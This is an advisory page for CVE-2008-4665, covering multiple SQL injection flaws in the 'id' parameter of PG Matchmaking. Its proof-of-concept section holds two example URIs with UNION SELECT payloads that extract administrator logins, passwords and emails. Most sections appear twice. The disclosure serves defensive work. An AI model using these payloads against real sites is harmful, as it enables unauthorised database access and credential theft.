PG Matchmaking 'id' Parameter Multiple SQL Injection Vulnerabilities
BID:31477
Info
PG Matchmaking 'id' Parameter Multiple SQL Injection Vulnerabilities
| Bugtraq ID: | 31477 |
| Class: | Input Validation Error |
| CVE: |
CVE-2008-4665 |
| Remote: | Yes |
| Local: | No |
| Published: | Sep 29 2008 12:00AM |
| Updated: | Apr 16 2015 05:53PM |
| Credit: | Super Cristal |
| Vulnerable: |
Pilot Group Matchmaking 0 |
| Not Vulnerable: | |
Discussion
PG Matchmaking 'id' Parameter Multiple SQL Injection Vulnerabilities
PG Matchmaking is prone to multiple SQL-injection vulnerabilities because it fails to sufficiently sanitize user-supplied data before using it in SQL queries.
Exploiting these issues could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
PG Matchmaking is prone to multiple SQL-injection vulnerabilities because it fails to sufficiently sanitize user-supplied data before using it in SQL queries.
Exploiting these issues could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
Exploit / POC
PG Matchmaking 'id' Parameter Multiple SQL Injection Vulnerabilities
Attackers can use a browser to exploit these issues.
The following example URIs are available:
http://www.example.com/[script_path]/news_read.php?id=-20 UNION SELECT 1,concat_ws(0x3e,Login,Password,EMail),3,4,5 FROM ADMINS--
http://www.example.com/[script_path]/gifts_show.php?id=-101 UNION SELECT 1,concat_ws(0x3e,Login,Password,EMail),3,4,5,6,7 FROM ADMINS--
Attackers can use a browser to exploit these issues.
The following example URIs are available:
http://www.example.com/[script_path]/news_read.php?id=-20 UNION SELECT 1,concat_ws(0x3e,Login,Password,EMail),3,4,5 FROM ADMINS--
http://www.example.com/[script_path]/gifts_show.php?id=-101 UNION SELECT 1,concat_ws(0x3e,Login,Password,EMail),3,4,5,6,7 FROM ADMINS--
Solution / Fix
PG Matchmaking 'id' Parameter Multiple SQL Injection Vulnerabilities
Solution:
Currently we are not aware of any vendor-supplied patches. If you feel we are in error or if you are aware of more recent information, please mail us at: [email protected].
Solution:
Currently we are not aware of any vendor-supplied patches. If you feel we are in error or if you are aware of more recent information, please mail us at: [email protected].
References
PG Matchmaking 'id' Parameter Multiple SQL Injection Vulnerabilities
References:
References:
- PG Matchmaking Homepage (Pilot Group)